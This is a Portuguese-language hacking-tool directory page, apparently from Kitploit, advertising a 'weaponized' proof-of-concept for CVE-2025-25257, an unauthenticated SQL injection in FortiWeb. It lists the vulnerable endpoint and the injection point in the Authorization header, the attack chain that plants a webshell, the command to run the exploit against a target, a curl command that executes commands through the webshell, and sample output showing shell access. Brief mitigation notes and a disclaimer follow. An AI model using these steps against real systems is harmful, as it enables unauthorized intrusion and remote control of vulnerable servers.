Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-25257 — PoC para CVE-2025-25257, uma injeção SQL crítica não autenticada no FortiWeb. Explora SQLi através do cabeçalho Authorization para escrever um webshell e obter RCE. Não requer login. Totalmente automatizado. | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC para CVE-2025-25257, uma injeção SQL crítica não autenticada no FortiWeb. Explora SQLi através do cabeçalho Authorization para escrever um webshell e obter RCE. Não requer login. Totalmente automatizado.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-25257 – SQLi para RCE no FortiWeb

Injeção SQL Crítica → Execução de Webshell

Discovered and weaponized by 0xgh057r3c0n


🧠 Visão Geral da Vulnerabilidade

O CVE-2025-25257 afeta sistemas FortiWeb que expõem o endpoint /api/fabric/device/status, o qual não sanitiza adequadamente a entrada do cabeçalho Authorization.

Um atacante pode realizar injeção SQL não autenticada para escrever um webshell no servidor e executar comandos remotamente.


💥 Fluxo de Ataque

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 Endpoint Vulnerável

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 Recursos do Exploit

  • SQLi via token Bearer
  • SQL INTO OUTFILE para soltar shell
  • Hook Python aciona chmod
  • Comandos executados via User-Agent
  • PoC totalmente automatizado

🧪 Uso

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

Em seguida:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 Requisitos

  • Python 3.6+
  • Módulo requests

Instalação:

root@kitploit:~
pip install requests

📤 Exemplo de Saída

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 Estimativa CVSS

MétricaValor
Pontuação Base9.8 (CRÍTICO)
Vetor de AtaqueRede
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
ImpactoAlto (C/I/A)

🛡️ Mitigação

  • Atualizar o firmware FortiWeb (se patch disponível)
  • Sanitizar todas as entradas de cabeçalho
  • Restringir caminhos de escrita de arquivos e execução CGI

👨‍💻 Autor

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ Aviso Legal

Este proof-of-concept é apenas para fins educacionais e testes autorizados. Use por sua conta e risco. O autor não é responsável pelo uso indevido.


Baixar ferramenta